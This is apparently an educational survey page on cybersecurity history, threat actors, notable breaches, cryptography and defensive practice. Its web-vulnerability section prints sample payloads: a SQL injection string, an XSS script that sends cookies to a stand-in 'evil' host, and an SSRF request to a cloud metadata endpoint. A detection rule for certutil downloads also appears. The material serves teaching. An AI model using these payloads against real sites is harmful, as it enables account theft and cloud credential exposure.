CYBER
SECURITY.
A field that began with one student running a worm at MIT in 1988, and turned into the connective tissue of every other industry. Sixteen pages of attackers, defenders, and the tooling between them.
1988-11-02 — the Morris Worm
Robert Tappan Morris, 23, a Cornell grad student, released a self-replicating program from MIT to "gauge the size of the internet." A bug in the duplicate-detection logic caused it to fork uncontrollably. Within hours it had infected ~6,000 of the ~60,000 hosts then on the net. Morris became the first person convicted under the 1986 Computer Fraud and Abuse Act.
The aftermath: DARPA funded the first CERT/CC at Carnegie Mellon. The internet had its first vulnerability disclosure pipeline.
/* the bug, conceptually */ if (already_infected(host) && random() % 7 != 0) skip(); // Morris flipped the constant trying to defeat false-positive // defenses. Result: 1/7 chance of reinfection on every probe.
The CIA triad & threat models
C — Confidentiality
Data accessible only to authorized parties. Encryption, access control, isolation.
I — Integrity
Data unchanged except by authorized actors. Signatures, hashes, audit logs.
A — Availability
Service usable when needed. DDoS resistance, redundancy, rate limits.
STRIDE
Microsoft (2002): Spoofing, Tampering, Repudiation, Information disclosure, DoS, Elevation of privilege.
MITRE ATT&CK
A living catalog of adversary tactics, techniques, and procedures (TTPs) keyed to real-world campaigns. The lingua franca of detection engineering.
Threat actor classes
| Class | Motivation | Examples |
|---|---|---|
| Script kiddie | Notoriety | LizardSquad |
| Hacktivist | Politics | Anonymous, LulzSec |
| Cybercriminal | Money | Conti, REvil, LockBit |
| Nation-state APT | Espionage / sabotage | APT28 (RU), APT41 (CN), Lazarus (DPRK), Equation (US) |
| Insider | Variable | Snowden (disclosure), Manning (disclosure) |
The zero-day economy
A 0-day is a vulnerability not yet known to the vendor. The market: bug bounty (Google VRP, ZDI), defensive vendors, and offensive brokers like Zerodium, who in 2026 still pays up to $2.5M for a remote zero-click iOS chain.
Notable disclosures:
- Stuxnet (2010) — four Windows zero-days plus a Siemens PLC exploit. Reportedly U.S./Israeli operation against Iranian uranium centrifuges at Natanz.
- Heartbleed (CVE-2014-0160) — OpenSSL memory disclosure. Patched in <72h, mitigation took years.
- EternalBlue (2017) — NSA SMBv1 exploit leaked by Shadow Brokers; powered WannaCry & NotPetya.
- Log4Shell (CVE-2021-44228) — JNDI injection in log4j 2.x. CVSS 10.0. The patch sprint of the year.
Web vulnerability classics
# SQL injection SELECT * FROM users WHERE name='' OR '1'='1' --'; # XSS — stored <script>fetch('//evil/?c='+document.cookie)</script> # SSRF GET /fetch?url=http://169.254.169.254/latest/meta-data/
The OWASP Top 10 (2021): broken access control, cryptographic failures, injection, insecure design, security misconfiguration, vulnerable components, identification/authentication failures, software/data integrity failures, security logging failures, server-side request forgery.
Ransomware as a service
Ransomware grew from a curiosity (PC Cyborg, 1989) into a multi-billion-dollar criminal industry with affiliate models, leak-site negotiation portals, and cryptocurrency rails. Notable hits:
| Incident | Year | Note |
|---|---|---|
| WannaCry | 2017 | NHS, Renault, Maersk affected; killswitch domain by MalwareTech |
| NotPetya | 2017 | Russian wiper masquerading as ransomware; ~$10B damage |
| Colonial Pipeline | 2021 | DarkSide; U.S. fuel-supply disruption |
| MOVEit | 2023 | Cl0p mass exploitation; thousands of orgs |
| Change Healthcare | 2024 | BlackCat / ALPHV; $22M ransom paid |
Zero Trust
"Never trust, always verify" — Forrester, John Kindervag, 2010. NIST SP 800-207 (2020) codified the principles. The perimeter is gone; every request is authenticated, authorized, encrypted.
Supply-chain attacks
The new front, since the 2020 SolarWinds Orion compromise (UNC2452 / Cozy Bear) shipped a backdoored DLL to ~18,000 customers including U.S. federal agencies. Subsequent incidents — Codecov, Kaseya, 3CX, MOVEit, XZ Utils (2024) — demonstrate that you can outsource trust but not security.
"You are as secure as your weakest dependency." — folk maxim, post-Log4Shell.
Crypto primitives
| Primitive | Use | Notes |
|---|---|---|
| AES-256-GCM | Authenticated encryption | NIST FIPS 197 + SP 800-38D |
| SHA-256, SHA-3 | Hashing | SHA-1 broken (SHAttered, 2017) |
| RSA-2048, ECDSA P-256 | Signatures | To be deprecated by PQC |
| X25519 | Key exchange | TLS 1.3 default |
| ML-KEM (Kyber) | Post-quantum KEM | NIST FIPS 203 (2024) |
| ML-DSA (Dilithium) | Post-quantum signatures | NIST FIPS 204 (2024) |
Defensive stack
A modern enterprise SOC operates with: SIEM (Splunk, Sentinel, Elastic), EDR (CrowdStrike, SentinelOne, Defender), identity (Okta, Azure AD), network (firewall, IDS/IPS, NDR), DLP, SOAR for orchestration, and threat intel feeds. Detection engineers write rules in Sigma, KQL, or YARA.
// example Sigma-style rule (excerpt) title: Suspicious LOLBin — certutil.exe download detection: selection: Image|endswith: '\certutil.exe' CommandLine|contains: '-urlcache' condition: selection level: high
Incident response (NIST SP 800-61)
- Preparation — playbooks, contact lists, tabletop exercises.
- Detection & analysis — alerts, scoping, IOCs.
- Containment — short-term isolation; long-term patching.
- Eradication — remove footholds, rotate secrets.
- Recovery — restore from clean state, monitor for re-entry.
- Lessons learned — postmortem, control updates.
WATCH_
Glossary
| Term | Meaning |
|---|---|
| CVE | Common Vulnerabilities and Exposures — public ID for a specific flaw. |
| CVSS | 0.0–10.0 severity score for a CVE. |
| IOC | Indicator of compromise (hash, domain, IP, behavior). |
| TTP | Tactics, techniques, procedures — adversary playbook elements. |
| RCE | Remote code execution — usually critical severity. |
| Pwn | Compromise; "owned." From a 1990s Warcraft typo. |
Open problems
- Memory-safe languages eating C/C++ in the kernel and browsers.
- Operationalizing the post-quantum migration without breaking the long-tail PKI.
- AI-augmented attackers vs. AI-augmented defenders — net effect unclear.
- Hardware supply-chain attestation (e.g., Caliptra, SiFive Worldguard).
- Securing the agentic AI runtime: prompt injection, tool poisoning, exfiltration.